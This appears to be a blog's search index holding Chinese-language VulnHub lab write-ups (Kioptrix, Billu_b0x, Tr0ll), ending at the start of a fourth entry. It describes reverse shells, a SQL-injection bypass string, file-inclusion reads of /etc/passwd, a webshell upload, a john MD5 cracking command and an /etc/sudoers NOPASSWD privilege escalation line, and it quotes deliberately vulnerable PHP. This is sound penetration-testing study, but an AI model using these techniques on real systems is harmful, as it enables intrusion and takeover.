-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsearch.xml
235 lines (111 loc) · 102 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>Kioptrix1.2</title>
<link href="/2023/05/12/Kioptrix1.2/"/>
<url>/2023/05/12/Kioptrix1.2/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="nmap端口扫描"><a href="#nmap端口扫描" class="headerlink" title="nmap端口扫描"></a>nmap端口扫描</h3><p><img src="/2023/05/12/Kioptrix1.2/image-20230512204421057.png" alt="image-20230512204421057"></p><p>开启22/80端口</p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p><img src="/2023/05/12/Kioptrix1.2/image-20230512204813358.png" alt="image-20230512204813358"></p><h2 id="web渗透"><a href="#web渗透" class="headerlink" title="web渗透"></a>web渗透</h2><p><img src="/2023/05/12/Kioptrix1.2/image-20230512204826533.png" alt="image-20230512204826533"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512205523259.png" alt="image-20230512205523259"></p><p>发现为LotuCMS</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512205538590.png" alt="image-20230512205538590"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512210624840.png" alt="image-20230512210624840"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512210645034.png" alt="image-20230512210645034"></p><p>通过searchsploit搜索相关的漏洞利用文件,发现全是xss与crsf漏洞,比较难利用,于是通过搜索引擎搜索其他相关漏洞利用信息,发现以下文章<a href="https://vk9-sec.com/lotuscms-3-0-eval-remote-command-execution/">lotuscms-3-0-eval-remote-command-execution</a></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512213721703.png" alt="image-20230512213721703"></p><p>成功rce读取/etc/passwd文件</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512214326100.png" alt="image-20230512214326100"></p><p>执行反弹shell</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512214236061.png" alt="image-20230512214236061"></p><p>成功远程连接</p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>发现数据库配置文件,获得数据库登陆账号密码:root/fuckeyou</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512222130046.png" alt="image-20230512222130046"></p><p>登陆数据库查看账号信息</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512222227494.png" alt="image-20230512222227494"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512222302549.png" alt="image-20230512222302549"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512222327552.png" alt="image-20230512222327552"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512223148032.png" alt="image-20230512223148032"></p><p>获得后台登陆的adminz账号:admin/n0t7t1k4 但对于提权的利用不大</p><p>获得系统中的用户名以及对应的加密密文</p><p>dreg/0d3eccfb887aabd50f243b3f155c0f85</p><p>loneferret/5badcaf789d3d1d09794d8f021f40f0e</p><p>在/etc/passwd能够查看到这两个用户</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512223336952.png" alt="image-20230512223336952"></p><p>利用john爆破md5密文</p><p><code>john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt passwd</code></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512223703622.png" alt="image-20230512223703622"></p><p>登陆</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512224227780.png" alt="image-20230512224227780"></p><h2 id="进一步提权"><a href="#进一步提权" class="headerlink" title="进一步提权"></a>进一步提权</h2><p>CompanyPolicy.README文件提示ht命令是一个文件编辑器</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230513220350791.png" alt="image-20230513220350791"></p><p>通过sudo -l能够查看ht命令的执行权限是root权限,能够更改/etc/sudoers文件,在文件内添加/bin/bash命令执行权限,最后成功提权</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230513220901613.png" alt="image-20230513220901613"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230513220940228.png" alt="image-20230513220940228"></p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>Billu_b0x</title>
<link href="/2023/05/10/Billu_b0x/"/>
<url>/2023/05/10/Billu_b0x/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="nnap"><a href="#nnap" class="headerlink" title="nnap"></a>nnap</h3><p><img src="/2023/05/10/Billu_b0x/image-20230509114020823.png" alt="image-20230509114020823"></p><p>靶机IP地址为192.168.37.130 开放端口22,80</p><p><img src="/2023/05/10/Billu_b0x/image-20230509114033119.png" alt="image-20230509114033119"></p><p><img src="/2023/05/10/Billu_b0x/image-20230509114045216.png" alt="image-20230509114045216"></p><p>通过nmap内置漏洞扫描发现存在个别敏感路径</p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p><img src="/2023/05/10/Billu_b0x/image-20230509114103206.png" alt="image-20230509114103206"></p><p>add.php为文件上传</p><p><img src="/2023/05/10/Billu_b0x/image-20230509115625059.png" alt="image-20230509115625059"></p><p>test.php中提示file参数,疑似存在文件包含</p><p><img src="/2023/05/10/Billu_b0x/image-20230509120148621.png" alt="image-20230509120148621"></p><h2 id="WEB渗透"><a href="#WEB渗透" class="headerlink" title="WEB渗透"></a>WEB渗透</h2><p>get传参方式不成功,尝试POST传参</p><p><img src="/2023/05/10/Billu_b0x/image-20230509120206432.png" alt="image-20230509120206432"></p><p>成功文件包含,查看敏感文件/etc/passwd</p><p><img src="/2023/05/10/Billu_b0x/image-20230509120131075.png" alt="image-20230509120131075"></p><p>index.php提示sql注入,add.php存在文件上传,可通过查看这两个源码进而代码审计是否存在文件上传漏洞and sql注入漏洞</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#curl -X POST --data "file=index.php" http://192.168.37.130/test.php</span></span><br><span class="line"><span class="comment">#index.php</span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">'c.php'</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'head.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(@<span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]!=<span class="literal">true</span>)</span><br><span class="line">{</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]=<span class="string">''</span>;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]==<span class="literal">true</span> && <span class="variable">$_SESSION</span>[<span class="string">'admin'</span>]!=<span class="string">''</span>)</span><br><span class="line">{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"you are logged in :)"</span>;</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: panel.php'</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<div align=center style="margin:30px 0px 0px 0px;"></span></span><br><span class="line"><span class="string"><font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font> </span></span><br><span class="line"><span class="string"><br><br></span></span><br><span class="line"><span class="string">Show me your SQLI skills <br></span></span><br><span class="line"><span class="string"><form method=post></span></span><br><span class="line"><span class="string">Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br></span></span><br><span class="line"><span class="string"><input type=submit name=login value="let\'s login">'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'login'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="variable">$uname</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'\''</span>,<span class="string">''</span>,<span class="title function_ invoke__">urldecode</span>(<span class="variable">$_POST</span>[<span class="string">'un'</span>]));</span><br><span class="line"> <span class="variable">$pass</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'\''</span>,<span class="string">''</span>,<span class="title function_ invoke__">urldecode</span>(<span class="variable">$_POST</span>[<span class="string">'ps'</span>]));</span><br><span class="line"> <span class="variable">$run</span>=<span class="string">'select * from auth where pass=\''</span>.<span class="variable">$pass</span>.<span class="string">'\' and uname=\''</span>.<span class="variable">$uname</span>.<span class="string">'\''</span>;</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>, <span class="variable">$run</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">mysqli_num_rows</span>(<span class="variable">$result</span>) > <span class="number">0</span>) {</span><br><span class="line"></span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysqli_fetch_assoc</span>(<span class="variable">$result</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"You are allowed<br>"</span>;</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]=<span class="literal">true</span>;</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'admin'</span>]=<span class="variable">$row</span>[<span class="string">'username'</span>];</span><br><span class="line"> </span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: panel.php'</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line"> </span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<script>alert('Try again');</script>"</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> "</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br><span class="line">select * <span class="keyword">from</span> auth where pass=<span class="string">''</span>.<span class="variable">$pass</span>.<span class="string">''</span> <span class="keyword">and</span> uname=<span class="string">''</span>.<span class="variable">$uname</span>.<span class="string">''</span></span><br></pre></td></tr></table></figure><p>登陆成功后会跳转到panel.php</p><p>sql查询语句为:select * from auth where pass=’password’ and uname=’admin’ 其中<code>str_replace</code>函数对单引号进行过滤</p><p>此处可以构造语句 or 1=1 –\ 即可绕过,填充后的sql语句为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from auth where pass='or 1=1 --\' and uname='or 1=1 --\'</span><br></pre></td></tr></table></figure><p>成功登陆</p><p><img src="/2023/05/10/Billu_b0x/image-20230509153246875.png" alt="image-20230509153246875"></p><p>和add.php一样存在文件上传。利用文件包含查看源码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">'c.php'</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'head2.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(@<span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]!=<span class="literal">true</span> )</span><br><span class="line">{</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: index.php'</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"Welcome to billu b0x "</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>'</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'lg'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">unset</span>(<span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]);</span><br><span class="line"> <span class="keyword">unset</span>(<span class="variable">$_SESSION</span>[<span class="string">'admin'</span>]);</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: index.php'</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<hr><br>'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<form method=post></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"><select name=load></span></span><br><span class="line"><span class="string"> <option value="show">Show Users</option></span></span><br><span class="line"><span class="string"> <option value="add">Add User</option></span></span><br><span class="line"><span class="string"></select> </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> &nbsp<input type=submit name=continue value="continue"></form><br><br>'</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'continue'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="variable">$dir</span>=<span class="title function_ invoke__">getcwd</span>();</span><br><span class="line"> <span class="variable">$choice</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'./'</span>,<span class="string">''</span>,<span class="variable">$_POST</span>[<span class="string">'load'</span>]);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$choice</span>===<span class="string">'add'</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">'/'</span>.<span class="variable">$choice</span>.<span class="string">'.php'</span>);</span><br><span class="line"> <span class="keyword">die</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$choice</span>===<span class="string">'show'</span>)</span><br><span class="line"> {</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">'/'</span>.<span class="variable">$choice</span>.<span class="string">'.php'</span>);</span><br><span class="line"> <span class="keyword">die</span>();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">'/'</span>.<span class="variable">$_POST</span>[<span class="string">'load'</span>]);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'upload'</span>]))</span><br><span class="line">{</span><br><span class="line"></span><br><span class="line"> <span class="variable">$name</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_POST</span>[<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$address</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_POST</span>[<span class="string">'address'</span>]);</span><br><span class="line"> <span class="variable">$id</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_POST</span>[<span class="string">'id'</span>]);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'name'</span>]))</span><br><span class="line"> {</span><br><span class="line"> <span class="variable">$iname</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$r</span>=<span class="title function_ invoke__">pathinfo</span>(<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'name'</span>],PATHINFO_EXTENSION);</span><br><span class="line"> <span class="variable">$image</span>=<span class="keyword">array</span>(<span class="string">'jpeg'</span>,<span class="string">'jpg'</span>,<span class="string">'gif'</span>,<span class="string">'png'</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$r</span>,<span class="variable">$image</span>))</span><br><span class="line"> {</span><br><span class="line"> <span class="variable">$finfo</span> = @<span class="keyword">new</span> <span class="title function_ invoke__">finfo</span>(FILEINFO_MIME); </span><br><span class="line"> <span class="variable">$filetype</span> = @<span class="variable">$finfo</span>-><span class="title function_ invoke__">file</span>(<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'tmp_name'</span>]);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">'/image\/jpeg/'</span>,<span class="variable">$filetype</span> ) || <span class="title function_ invoke__">preg_match</span>(<span class="string">'/image\/png/'</span>,<span class="variable">$filetype</span> ) || <span class="title function_ invoke__">preg_match</span>(<span class="string">'/image\/gif/'</span>,<span class="variable">$filetype</span> ))</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'tmp_name'</span>], <span class="string">'uploaded_images/'</span>.<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'name'</span>]))</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Uploaded successfully "</span>;</span><br><span class="line"> <span class="variable">$update</span>=<span class="string">'insert into users(name,address,image,id) values(\''</span>.<span class="variable">$name</span>.<span class="string">'\',\''</span>.<span class="variable">$address</span>.<span class="string">'\',\''</span>.<span class="variable">$iname</span>.<span class="string">'\', \''</span>.<span class="variable">$id</span>.<span class="string">'\')'</span>; </span><br><span class="line"> <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>, <span class="variable">$update</span>);</span><br><span class="line"> </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>i told you dear, only png,jpg and gif file are allowed"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>only png,jpg and gif file are allowed"</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>从代码中可以分析到文件的保存地址为:/uploaded_images/</p><p>在代码中存在文件上传,也存在任意文件包含,在load参数中</p><img src="/2023/05/10/Billu_b0x/image-20230509235251300.png" alt="image-20230509235251300" style="zoom:60%;"><p>上传一个jpg文件,能够访问</p><p><img src="/2023/05/10/Billu_b0x/image-20230509153813307.png" alt="image-20230509153813307"></p><p>利用burpsuite 对图片的数据内容进行修改,上传图片马,尝试修改load值查看是否能够访问</p><p><img src="/2023/05/10/Billu_b0x/image-20230509235734366.png" alt="image-20230509235734366"></p><p><img src="/2023/05/10/Billu_b0x/image-20230510000502176.png" alt="image-20230510000502176"></p><p>成功执行命令,重新上传反弹shell一句话木马获得反弹shell</p><p><img src="/2023/05/10/Billu_b0x/image-20230510001034659.png" alt="image-20230510001034659"></p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><h3 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h3><p>在phpmy中发现phpmyadmin配置文件,查看配置文件获得账号密码root/roottoor 尝试ssh登陆</p><p><img src="/2023/05/10/Billu_b0x/image-20230510001413130.png" alt="image-20230510001413130"></p><p><img src="/2023/05/10/Billu_b0x/image-20230510001530836.png" alt="image-20230510001530836"></p><p>成功提权</p><h3 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h3><p>内核提权</p><p><img src="/2023/05/10/Billu_b0x/image-20230510002322291.png" alt="image-20230510002322291"></p><p>lsb_release -a </p><p><img src="/2023/05/10/Billu_b0x/image-20230510002401112.png" alt="image-20230510002401112"></p><p><img src="/2023/05/10/Billu_b0x/image-20230510002419385.png" alt="image-20230510002419385"></p><p><img src="/2023/05/10/Billu_b0x/image-20230510002524934.png" alt="image-20230510002524934"></p><p><img src="/2023/05/10/Billu_b0x/image-20230510002942842.png" alt="image-20230510002942842"></p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>Tr0ll</title>
<link href="/2023/05/08/Tr0ll/"/>
<url>/2023/05/08/Tr0ll/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap扫描</h3><p><img src="/2023/05/08/Tr0ll/image-20230507231822026.png" alt="image-20230507231822026"></p><p>主机ip地址为:192.168.37.129</p><p><img src="/2023/05/08/Tr0ll/image-20230507231841442.png" alt="image-20230507231841442"></p><p>主机开放端口:21,22,80</p><h2 id="ftp匿名登陆"><a href="#ftp匿名登陆" class="headerlink" title="ftp匿名登陆"></a>ftp匿名登陆</h2><p>成功匿名登陆,发现pcap流量数据包,get下载到本地用wireshark打开</p><p><img src="/2023/05/08/Tr0ll/image-20230507231853919.png" alt="image-20230507231853919"></p><h2 id="pcap流量分析"><a href="#pcap流量分析" class="headerlink" title="pcap流量分析"></a>pcap流量分析</h2><p><img src="/2023/05/08/Tr0ll/image-20230508143724860.png" alt="image-20230508143724860"></p><blockquote><p><code>RETR</code>是FTP协议中的一个命令,”RETR”是”Retrieve”的缩写,指示FTP服务器将指定的文件发送到FTP客户端。</p><p>在FTP会话中,客户端可以使用”RETR”命令向服务器请求文件,服务器将文件作为响应发送回客户端。</p><p>FTP客户端将发送命令到FTP服务器,并等待服务器响应。如果文件存在并且客户端有足够的权限访问该文件,则FTP服务器将发送文件内容作为响应。客户端将接收到的数据写入本地文件,以完成下载过程。</p></blockquote><p><img src="/2023/05/08/Tr0ll/image-20230508145300570.png" alt="image-20230508145300570"></p><p>在FTP-DATA协议中存在命令的响应内容,提示 sup3rs3cr3tdirlol,super secret dir </p><p>在web服务中访问一下该文件夹</p><h2 id="80端口"><a href="#80端口" class="headerlink" title="80端口"></a>80端口</h2><p>下载该文件</p><p><img src="/2023/05/08/Tr0ll/image-20230508145555350.png" alt="image-20230508145555350"></p><p><img src="/2023/05/08/Tr0ll/image-20230508152317759.png" alt="image-20230508152317759"></p><p>提示address 尝试访问/0x0856BF/ 获得新目录</p><p><img src="/2023/05/08/Tr0ll/image-20230508152426222.png" alt="image-20230508152426222"></p><p>将新目录中的文件夹下载到本地查看内容</p><p><img src="/2023/05/08/Tr0ll/image-20230508153030945.png" alt="image-20230508153030945"></p><p>疑似which_one_lol.txt文件中的内容是用户名,此时思路就是用crackmapexec密码喷射破解</p><blockquote><p>crackmapexec 命令介绍</p><p>CrackMapExec是一个开源的渗透测试工具,用于评估网络安全,它可以帮助安全专业人员评估网络中的弱点。CrackMapExec支持多种协议,如SMB、LDAP、HTTP等,可以用于口令破解、漏洞利用、信息收集等任务。</p></blockquote><p><img src="/2023/05/08/Tr0ll/image-20230508153946048.png" alt="image-20230508153946048"></p><blockquote><p>crackmapexec ssh –help</p><p>–continue-on-success<br> continues authentication attempts even after successes</p></blockquote><p>出现报错为无法连接22端口,怀疑是服务器对短时间的ssh登陆进行限制。将文件内容倒转尝试</p><p><img src="/2023/05/08/Tr0ll/image-20230508160326969.png" alt="image-20230508160326969"></p><p>发现密码全是错误的,由于在该文件夹中存在密码的提示,尝试用文件名作为密码进行破解</p><p><img src="/2023/05/08/Tr0ll/image-20230508160227625.png" alt="image-20230508160227625"></p><p><img src="/2023/05/08/Tr0ll/image-20230508160621079.png" alt="image-20230508160621079"></p><p>成功破解出账号密码</p><p><img src="/2023/05/08/Tr0ll/image-20230508161328272.png" alt="image-20230508161328272"></p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p><img src="/2023/05/08/Tr0ll/image-20230508162525285.png" alt="image-20230508162525285"></p><p>在ssh连接时,会出现这个导致ssh连接被关闭,怀疑设置了个定时任务,而该定时任务是来自root权限的定时任务,找出该任务并修改对应的脚本即可提权。</p><p><img src="/2023/05/08/Tr0ll/image-20230508163033203.png" alt="image-20230508163033203"></p><p><img src="/2023/05/08/Tr0ll/image-20230508163209439.png" alt="image-20230508163209439"></p><blockquote><p>echo “overflow ALL=(ALL)NOPASSWD:ALL” >> /etc/sudoers</p></blockquote><p><img src="/2023/05/08/Tr0ll/image-20230508163305056.png" alt="image-20230508163305056"></p><p>成功提权</p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>pWnOS</title>
<link href="/2023/04/21/pWnOS/"/>
<url>/2023/04/21/pWnOS/</url>
